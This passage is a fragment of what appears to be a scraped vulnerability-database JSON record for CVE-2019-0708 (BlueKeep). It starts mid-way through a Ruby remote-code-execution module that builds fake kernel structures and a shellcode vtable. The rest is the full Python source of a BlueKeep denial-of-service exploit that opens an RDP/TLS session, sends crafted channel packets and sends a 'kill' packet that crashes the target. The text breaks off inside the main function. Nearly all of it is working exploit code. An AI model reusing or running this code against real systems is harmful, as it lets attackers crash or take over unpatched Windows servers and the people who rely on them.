KSEVENT, 8 bytes) \nmagic_value2, # OwnerThread (ULONG, 8 bytes) \nmagic_value2, # TableSize (ULONG, 8 bytes) \n0x0, # ActiveEntries (DWORD, 4 bytes) \n0x0, # ContenttionCount (DWORD, 4 bytes) \n0x0, # NumberOfSharedWaiters (DWORD, 4 bytes) \n0x0, # NumberOfExclusiveWaiters (DWORD, 4 bytes) \n0x0, # Reserved2 (PVOID, 8 bytes) x64 only \nmagic_value2, # Address (PVOID, 8 bytes) \n0x0, # SpinLock (UINT_PTR, 8 bytes) \n].pack('<Q<Q<Q<S<S<L<Q<Q<Q<Q<L<L<L<L<Q<Q<Q'), \n[ \n0x1F, # ClassOffset (DWORD, 4 bytes) \n0x0, # bindStatus (DWORD, 4 bytes) \n0x72, # lockCount1 (QWORD, 8 bytes) \nmagic_value3, # connection (QWORD, 8 bytes) \nshellcode_vtbl, # shellcode vtbl ? (QWORD, 8 bytes) \n0x5, # channelClass (DWORD, 4 bytes) \n\"MS_T120\\x00\".encode('ASCII'), # channelName (BYTE[8], 8 bytes) \n0x1F, # channelIndex (DWORD, 4 bytes) \nmagic_value1, # channels (QWORD, 8 bytes) \nmagic_value1, # connChannelsAddr (POINTER, 8 bytes) \nmagic_value1, # list1 (QWORD, 8 bytes) \nmagic_value1, # list1 (QWORD, 8 bytes) \nmagic_value1, # list2 (QWORD, 8 bytes) \nmagic_value1, # list2 (QWORD, 8 bytes) \n0x65756c62, # inputBufferLen (DWORD, 4 bytes) \n0x7065656b, # inputBufferLen (DWORD, 4 bytes) \nmagic_value1, # connResrouce (QWORD, 8 bytes) \n0x65756c62, # lockCount158 (DWORD, 4 bytes) \n0x7065656b, # dword15C (DWORD, 4 bytes) \n].pack('<L<L<Q<Q<Q<La*<L<Q<Q<Q<Q<Q<Q<L<L<Q<L<L') \n].join('') \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/154579/cve_2019_0708_bluekeep_rce.rb.txt"}, {"lastseen": "2019-05-31T20:29:38", "description": "", "published": "2019-05-30T00:00:00", "type": "packetstorm", "title": "Microsoft Windows Remote Desktop BlueKeep Denial Of Service", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-0708"], "modified": "2019-05-30T00:00:00", "id": "PACKETSTORM:153133", "href": "https://packetstormsecurity.com/files/153133/Microsoft-Windows-Remote-Desktop-BlueKeep-Denial-Of-Service.html", "sourceData": "`import socket, sys, struct \nfrom OpenSSL import SSL \nfrom impacket.structure import Structure \n \n# I'm not responsible for what you use this to accomplish and should only be used for education purposes \n \n# Could clean these up since I don't even use them \nclass TPKT(Structure): \ncommonHdr = ( \n('Version','B=3'), \n('Reserved','B=0'), \n('Length','>H=len(TPDU)+4'), \n('_TPDU','_-TPDU','self[\"Length\"]-4'), \n('TPDU',':=\"\"'), \n) \n \nclass TPDU(Structure): \ncommonHdr = ( \n('LengthIndicator','B=len(VariablePart)+1'), \n('Code','B=0'), \n('VariablePart',':=\"\"'), \n) \ndef __init__(self, data = None): \nStructure.__init__(self,data) \nself['VariablePart']='' \n \nclass CR_TPDU(Structure): \ncommonHdr = ( \n('DST-REF','<H=0'), \n('SRC-REF','<H=0'), \n('CLASS-OPTION','B=0'), \n('Type','B=0'), \n('Flags','B=0'), \n('Length','<H=8'), \n) \n \nclass DATA_TPDU(Structure): \ncommonHdr = ( \n('EOT','B=0x80'), \n('UserData',':=\"\"'), \n) \ndef __init__(self, data = None): \nStructure.__init__(self,data) \nself['UserData'] ='' \n \nclass RDP_NEG_REQ(CR_TPDU): \nstructure = ( \n('requestedProtocols','<L'), \n) \ndef __init__(self,data=None): \nCR_TPDU.__init__(self,data) \nif data is None: \nself['Type'] = 1 \n \ndef send_init_packets(host): \ntpkt = TPKT() \ntpdu = TPDU() \nrdp_neg = RDP_NEG_REQ() \nrdp_neg['Type'] = 1 \nrdp_neg['requestedProtocols'] = 1 \ntpdu['VariablePart'] = rdp_neg.getData() \ntpdu['Code'] = 0xe0 \ntpkt['TPDU'] = tpdu.getData() \ns = socket.socket() \ns.connect((host, 3389)) \ns.sendall(tpkt.getData()) \ns.recv(8192) \nctx = SSL.Context(SSL.TLSv1_METHOD) \ntls = SSL.Connection(ctx,s) \ntls.set_connect_state() \ntls.do_handshake() \nreturn tls \n \n# This can be fixed length now buttfuckit \ndef send_client_data(tls): \np = \"\\x03\\x00\\x01\\xca\\x02\\xf0\\x80\\x7f\\x65\\x82\\x07\\xc2\\x04\\x01\\x01\\x04\\x01\\x01\\x01\\x01\\xff\\x30\\x19\\x02\\x01\\x22\\x02\\x01\\x02\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x30\\x19\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\x04\\x20\\x02\\x01\\x02\\x30\\x1c\\x02\\x02\\xff\\xff\\x02\\x02\\xfc\\x17\\x02\\x02\\xff\\xff\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x04\\x82\\x01\\x61\\x00\\x05\\x00\\x14\\x7c\\x00\\x01\\x81\\x48\\x00\\x08\\x00\\x10\\x00\\x01\\xc0\\x00\\x44\\x75\\x63\\x61\\x81\\x34\\x01\\xc0\\xea\\x00\\x0a\\x00\\x08\\x00\\x80\\x07\\x38\\x04\\x01\\xca\\x03\\xaa\\x09\\x04\\x00\\x00\\xee\\x42\\x00\\x00\\x44\\x00\\x45\\x00\\x53\\x00\\x4b\\x00\\x54\\x00\\x4f\\x00\\x50\\x00\\x2d\\x00\\x46\\x00\\x38\\x00\\x34\\x00\\x30\\x00\\x47\\x00\\x49\\x00\\x4b\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xca\\x01\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x0f\\x00\\xaf\\x07\\x62\\x00\\x63\\x00\\x37\\x00\\x38\\x00\\x65\\x00\\x66\\x00\\x36\\x00\\x33\\x00\\x2d\\x00\\x39\\x00\\x64\\x00\\x33\\x00\\x33\\x00\\x2d\\x00\\x34\\x00\\x31\\x00\\x39\\x38\\x00\\x38\\x00\\x2d\\x00\\x39\\x00\\x32\\x00\\x63\\x00\\x66\\x00\\x2d\\x00\\x00\\x31\\x00\\x62\\x00\\x32\\x00\\x64\\x00\\x61\\x00\\x42\\x42\\x42\\x42\\x07\\x00\\x01\\x00\\x00\\x00\\x56\\x02\\x00\\x00\\x50\\x01\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x04\\xc0\\x0c\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xc0\\x0c\\x00\\x1b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\xc0\\x38\\x00\\x04\\x00\\x00\\x00\\x72\\x64\\x70\\x73\\x6e\\x64\\x00\\x00\\x0f\\x00\\x00\\xc0\\x63\\x6c\\x69\\x70\\x72\\x64\\x72\\x00\\x00\\x00\\xa0\\xc0\\x64\\x72\\x64\\x79\\x6e\\x76\\x63\\x00\\x00\\x00\\x80\\xc0\\x4d\\x53\\x5f\\x54\\x31\\x32\\x30\\x00\\x00\\x00\\x00\\x00\" \nsize0 = struct.pack(\">h\", len(p)) \nsize1 = struct.pack(\">h\", len(p)-12) \nsize2 = struct.pack(\">h\", len(p)-109) \nsize3 = struct.pack(\">h\", len(p)-118) \nsize4 = struct.pack(\">h\", len(p)-132) \nsize5 = struct.pack(\">h\", len(p)-390) \nba = bytearray() \nba.extend(map(ord, p)) \nba[2] = size0[0] \nba[3] = size0[1] \nba[10] = size1[0] \nba[11] = size1[1] \nba[107] = size2[0] \nba[108] = size2[1] \nba[116] = 0x81 \nba[117] = size3[1] \nba[130] = 0x81 \nba[131] = size4[1] \nba[392] = size5[1] \ntls.sendall(bytes(ba)) \ntls.recv(8192) \n \ndef send_client_info(tls): \np = b\"\\x03\\x00\\x01\\x61\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x81\\x52\\x40\\x00\\xa1\\xa5\\x09\\x04\\x09\\x04\\xbb\\x47\\x03\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x00\\x00\\x74\\x00\\x65\\x00\\x73\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x41\\x41\\x41\\x00\\x38\\x00\\x2e\\x00\\x32\\x00\\x33\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x40\\x00\\x43\\x00\\x3a\\x00\\x5c\\x00\\x57\\x00\\x49\\x00\\x4e\\x00\\x41\\x41\\x41\\x00\\x57\\x00\\x53\\x00\\x5c\\x00\\x73\\x00\\x79\\x00\\x73\\x00\\x74\\x00\\x65\\x00\\x6d\\x00\\x33\\x00\\x32\\x00\\x5c\\x00\\x6d\\x00\\x73\\x00\\x74\\x00\\x73\\x00\\x63\\x00\\x61\\x00\\x78\\x00\\x2e\\x00\\x64\\x00\\x6c\\x00\\x6c\\x00\\x00\\x00\\xa4\\x01\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x44\\x00\\x61\\x00\\x79\\x00\\x6c\\x00\\x69\\x00\\x67\\x00\\x68\\x00\\x74\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc4\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\" \ntls.sendall(p) \n \ndef send_channel_packets(tls): \np1 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x04\\x01\\x00\\x01\\x00\" \ntls.sendall(p1) \np2 = b\"\\x03\\x00\\x00\\x08\\x02\\xf0\\x80\\x28\" \ntls.sendall(p2) \ntls.recv(1024) \np4 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xeb\" \ntls.sendall(p4) \ntls.recv(1024) \np5 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xec\" \ntls.sendall(p5) \ntls.recv(1024) \np6 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xed\" \ntls.sendall(p6) \ntls.recv(1024) \np7 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xee\" \ntls.sendall(p7) \ntls.recv(1024) \np8 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xef\" \ntls.sendall(p8) \ntls.recv(1024) \n \ndef send_confirm_active(tls, shareid): \np = \"\\x03\\x00\\x02\\x63\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x82\\x54\\x54\\x02\\x13\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\xea\\x03\\x06\\x00\\x3e\\x02\\x4d\\x53\\x54\\x53\\x43\\x00\\x17\\x00\\x00\\x00\\x01\\x00\\x18\\x00\\x01\\x00\\x03\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x1d\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x20\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x80\\x07\\x38\\x04\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x1a\\x01\\x00\\x00\\x00\\x03\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xaa\\x00\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x01\\x01\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\xa1\\x06\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x03\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x13\\x00\\x28\\x00\\x03\\x00\\x00\\x03\\x78\\x00\\x00\\x00\\x78\\x00\\x00\\x00\\xfc\\x09\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\\x08\\x00\\x06\\x00\\x00\\x00\\x07\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x08\\x00\\x0a\\x00\\x01\\x00\\x14\\x00\\x15\\x00\\x09\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x0d\\x00\\x58\\x00\\x91\\x00\\x20\\x00\\x09\\x04\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x34\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x10\\x00\\xfe\\x00\\x20\\x00\\xfe\\x00\\x40\\x00\\xfe\\x00\\x80\\x00\\xfe\\x00\\x00\\x01\\x40\\x00\\x00\\x08\\x00\\x01\\x00\\x01\\x03\\x00\\x00\\x00\\x0f\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x28\\x64\\x00\\x14\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x15\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x0a\\x00\\x01\\x1a\\x00\\x08\\x00\\xaf\\x94\\x00\\x00\\x1c\\x00\\x0c\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1b\\x00\\x06\\x00\\x01\\x00\\x1e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x0b\\x00\\x02\\x00\\x00\\x00\\x03\\x0c\\x00\\x1d\\x00\\x5f\\x00\\x02\\xb9\\x1b\\x8d\\xca\\x0f\\x00\\x4f\\x15\\x58\\x9f\\xae\\x2d\\x1a\\x87\\xe2\\xd6\\x01\\x03\\x00\\x01\\x01\\x03\\xd4\\xcc\\x44\\x27\\x8a\\x9d\\x74\\x4e\\x80\\x3c\\x0e\\xcb\\xee\\xa1\\x9c\\x54\\x05\\x31\\x00\\x31\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x25\\x00\\x00\\x00\\xc0\\xcb\\x08\\x00\\x00\\x00\\x01\\x00\\xc1\\xcb\\x1d\\x00\\x00\\x00\\x01\\xc0\\xcf\\x02\\x00\\x08\\x00\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x01\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x04\" \nba = bytearray() \nba.extend(map(ord, p)) \ntls.sendall(bytes(ba)) \n \ndef send_establish_session(tls): \np = b\"\\x03\\x00\\x00\\x24\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x16\\x16\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x08\\x00\\x1f\\x00\\x00\\x00\\x01\\x00\\xea\\x03\" \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \ntls.sendall(p) \np = b\"\\x03\\x00\\x05\\x81\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x85\\x72\\x72\\x05\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xa3\\xce\\x20\\x35\\xdb\\x94\\xa5\\xe6\\x0d\\xa3\\x8c\\xfb\\x64\\xb7\\x63\\xca\\xe7\\x9a\\x84\\xc1\\x0d\\x67\\xb7\\x91\\x76\\x71\\x21\\xf9\\x67\\x96\\xc0\\xa2\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\x2b\\xe7\\xb0\\xd2\\xfd\\x81\\x90\\x1a\\x8f\\xd5\\x5e\\xee\\x5a\\x6d\\xcb\\xea\\x2f\\xa5\\x2b\\x06\\xe9\\x0b\\x0b\\xa6\\xad\\x01\\x2f\\x7a\\x0b\\x7c\\xff\\x89\\xd3\\xa3\\xe1\\xf8\\x00\\x96\\xa6\\x8d\\x9a\\x42\\xfc\\xab\\x14\\x05\\x8f\\x16\\xde\\xc8\\x05\\xba\\xa0\\xa8\\xed\\x30\\xd8\\x67\\x82\\xd7\\x9f\\x84\\xc3\\x38\\x27\\xda\\x61\\xe3\\xa8\\xc3\\x65\\xe6\\xec\\x0c\\xf6\\x36\\x24\\xb2\\x0b\\xa6\\x17\\x1f\\x46\\x30\\x16\\xc7\\x73\\x60\\x14\\xb5\\xf1\\x3a\\x3c\\x95\\x7d\\x7d\\x2f\\x74\\x7e\\x56\\xff\\x9c\\xe0\\x01\\x32\\x9d\\xf2\\xd9\\x35\\x5e\\x95\\x78\\x2f\\xd5\\x15\\x6c\\x18\\x34\\x0f\\x43\\xd7\\x2b\\x97\\xa9\\xb4\\x28\\xf4\\x73\\x6c\\x16\\xdb\\x43\\xd7\\xe5\\x58\\x0c\\x5a\\x03\\xe3\\x73\\x58\\xd7\\xd9\\x76\\xc2\\xfe\\x0b\\xd7\\xf4\\x12\\x43\\x1b\\x70\\x6d\\x74\\xc2\\x3d\\xf1\\x26\\x60\\x58\\x80\\x31\\x07\\x0e\\x85\\xa3\\x95\\xf8\\x93\\x76\\x99\\x9f\\xec\\xa0\\xd4\\x95\\x5b\\x05\\xfa\\x4f\\xdf\\x77\\x8a\\x7c\\x29\\x9f\\x0b\\x4f\\xa1\\xcb\\xfa\\x95\\x66\\xba\\x47\\xe3\\xb0\\x44\\xdf\\x83\\x03\\x44\\x24\\xf4\\x1e\\xf2\\xe5\\xcb\\xa9\\x53\\x04\\xc2\\x76\\xcb\\x4d\\xc6\\xc2\\xd4\\x3f\\xd3\\x8c\\xb3\\x7c\\xf3\\xaa\\xf3\\x93\\xfe\\x25\\xbd\\x32\\x7d\\x48\\x6e\\x93\\x96\\x68\\xe5\\x18\\x2b\\xea\\x84\\x25\\x69\\x02\\xa5\\x38\\x65\\x6f\\x0f\\x9f\\xf6\\xa1\\x3a\\x1d\\x22\\x9d\\x3f\\x6d\\xe0\\x4c\\xee\\x8b\\x24\\xf0\\xdc\\xff\\x70\\x52\\xa7\\x0d\\xf9\\x52\\x8a\\x1e\\x33\\x1a\\x30\\x11\\x15\\xd7\\xf8\\x95\\xa9\\xbb\\x74\\x25\\x8c\\xe3\\xe9\\x93\\x07\\x43\\xf5\\x50\\x60\\xf7\\x96\\x2e\\xd3\\xff\\x63\\xe0\\xe3\\x24\\xf1\\x10\\x3d\\x8e\\x0f\\x56\\xbc\\x2e\\xb8\\x90\\x0c\\xfa\\x4b\\x96\\x68\\xfe\\x59\\x68\\x21\\xd0\\xff\\x52\\xfe\\x5c\\x7d\\x90\\xd4\\x39\\xbe\\x47\\x9d\\x8e\\x7a\\xaf\\x95\\x4f\\x10\\xea\\x7b\\x7a\\xd3\\xca\\x07\\x28\\x3e\\x4e\\x4b\\x81\\x0e\\xf1\\x5f\\x1f\\x8d\\xbe\\x06\\x40\\x27\\x2f\\x4a\\x03\\x80\\x32\\x67\\x54\\x2f\\x93\\xfd\\x25\\x5d\\x6d\\xa0\\xad\\x23\\x45\\x72\\xff\\xd1\\xeb\\x5b\\x51\\x75\\xa7\\x61\\xe0\\x3f\\xe4\\xef\\xf4\\x96\\xcd\\xa5\\x13\\x8a\\xe6\\x52\\x74\\x70\\xbf\\xc1\\xf9\\xfb\\x68\\x9e\\xdd\\x72\\x8f\\xb4\\x44\\x5f\\x3a\\xcb\\x75\\x2a\\x20\\xa6\\x69\\xd2\\x76\\xf9\\x57\\x46\\x2b\\x5b\\xda\\xba\\x0f\\x9b\\xe0\\x60\\xe1\\x8b\\x90\\x33\\x41\\x0a\\x2d\\xc5\\x06\\xfe\\xd0\\xf0\\xfc\\xde\\x35\\xd4\\x1e\\xaa\\x76\\x0b\\xae\\xf4\\xd5\\xbd\\xfa\\xf3\\x55\\xf5\\xc1\\x67\\x65\\x75\\x1c\\x1d\\x5e\\xe8\\x3a\\xfe\\x54\\x50\\x23\\x04\\xae\\x2e\\x71\\xc2\\x76\\x97\\xe6\\x39\\xc6\\xb2\\x25\\x87\\x92\\x63\\x52\\x61\\xd1\\x6c\\x07\\xc1\\x1c\\x00\\x30\\x0d\\xa7\\x2f\\x55\\xa3\\x4f\\x23\\xb2\\x39\\xc7\\x04\\x6c\\x97\\x15\\x7a\\xd7\\x24\\x33\\x91\\x28\\x06\\xa6\\xe7\\xc3\\x79\\x5c\\xae\\x7f\\x50\\x54\\xc2\\x38\\x1e\\x90\\x23\\x1d\\xd0\\xff\\x5a\\x56\\xd6\\x12\\x91\\xd2\\x96\\xde\\xcc\\x62\\xc8\\xee\\x9a\\x44\\x07\\xc1\\xec\\xf7\\xb6\\xd9\\x9c\\xfe\\x30\\x1c\\xdd\\xb3\\x3b\\x93\\x65\\x3c\\xb4\\x80\\xfb\\xe3\\x87\\xf0\\xee\\x42\\xd8\\xcf\\x08\\x98\\x4d\\xe7\\x6b\\x99\\x0a\\x43\\xed\\x13\\x72\\x90\\xa9\\x67\\xfd\\x3c\\x63\\x36\\xec\\x55\\xfa\\xf6\\x1f\\x35\\xe7\\x28\\xf3\\x87\\xa6\\xce\\x2e\\x34\\xaa\\x0d\\xb2\\xfe\\x17\\x18\\xa2\\x0c\\x4e\\x5f\\xf0\\xd1\\x98\\x62\\x4a\\x2e\\x0e\\xb0\\x8d\\xb1\\x7f\\x32\\x52\\x8e\\x87\\xc9\\x68\\x7c\\x0c\\xef\\xee\\x88\\xae\\x74\\x2a\\x33\\xff\\x4b\\x4d\\xc5\\xe5\\x18\\x38\\x74\\xc7\\x28\\x83\\xf7\\x72\\x87\\xfc\\x79\\xfb\\x3e\\xce\\xd0\\x51\\x13\\x2d\\x7c\\xb4\\x58\\xa2\\xe6\\x28\\x67\\x4f\\xec\\xa6\\x81\\x6c\\xf7\\x9a\\x29\\xa6\\x3b\\xca\\xec\\xb8\\xa1\\x27\\x50\\xb7\\xef\\xfc\\x81\\xbf\\x5d\\x86\\x20\\x94\\xc0\\x1a\\x0c\\x41\\x50\\xa9\\x5e\\x10\\x4a\\x82\\xf1\\x74\\x1f\\x78\\x21\\xf5\\x70\\x61\\x24\\x00\\x3d\\x47\\x5f\\xf3\\x25\\x80\\x3c\\x4b\\xea\\xa3\\xf4\\x77\\xea\\xa1\\x42\\x1a\\x17\\x0f\\x6d\\xa8\\x35\\x9e\\x91\\x26\\x34\\x43\\x04\\xc6\\xc6\\x5b\\x21\\x7d\\x8c\\xc7\\x22\\x91\\x7b\\x2c\\x2d\\x2f\\xd6\\x7e\\xa5\\x52\\xa8\\x08\\x80\\xeb\\x60\\xd1\\x44\\x09\\x8e\\x3c\\xa1\\xaa\\x67\\x60\\x0a\\x26\\xc6\\xb5\\xc6\\x79\\xa6\\x4f\\x8b\\x8c\\x25\\x5c\\xf1\\x0b\\x23\\xf4\\xd8\\xa6\\x6d\\xf1\\x91\\x78\\xf9\\xe5\\x2a\\x50\\x2f\\x5a\\x44\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\xbf\\x28\\xae\\xd9\\xa2\\x98\\xa5\\xbc\\x60\\xca\\xb8\\x90\\x4d\\x20\\x46\\xd9\\x8a\\x1a\\x30\\x01\\x8b\\x38\\x63\\x1a\\x57\\x09\\x51\\x46\\x95\\x9b\\xd8\\x80\\x0c\\xb0\\x77\\x24\\xbf\\x2b\\xd3\\x57\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x56\\x92\\x38\\xed\\x6b \ntls.sendall(p) \np = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x27\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x32\\x00\" \ntls.sendall(p) \n \ndef send_kill_packet(tls, arch): \nif arch == \"32\": \np = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nelif arch == \"64\": \np = b\"\\x03\\x00\\x00\\x2e\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xef\\x70\\x14\\x0c\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\" \nelse: \nprint(\"Make the second arguement '32' or '64' without quotes\") \nsys.exit() \ntls.sendall(p) \n \ndef terminate_connection(tls): \np = b\"\\x03\\x00\\x00\\x09\\x02\\xf0\\x80\\x21\\x80\" \ntls.sendall(p) \n \ndef main(args): \ntls = send_init_packets(args[1]) \n 